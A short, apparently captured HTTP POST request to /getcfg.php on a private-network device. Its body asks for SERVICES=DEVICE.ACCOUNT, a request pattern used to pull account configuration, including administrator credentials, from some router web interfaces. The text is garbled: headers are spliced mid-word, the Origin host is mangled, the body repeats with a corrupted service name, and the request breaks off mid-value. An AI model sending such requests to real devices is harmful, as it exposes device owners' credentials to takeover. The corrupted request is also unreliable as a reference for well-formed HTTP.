Content-POST /getcfg.php HTTP/1.1
Host: 172.21.0.2
Connection: keep-alive
Content-Length: 73
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/128.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Acceid=yWNeBthVkJ

SERVICES=DEVICpt: */*
Origin: http://1@2.21.0.2
Referer: http://172.21.0.2/tools.phpx
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: uid=yWNeBthVkJ

SERVICES=DEVICE.ACCOUNT%2CHTTP.WCINBFILTER%2CS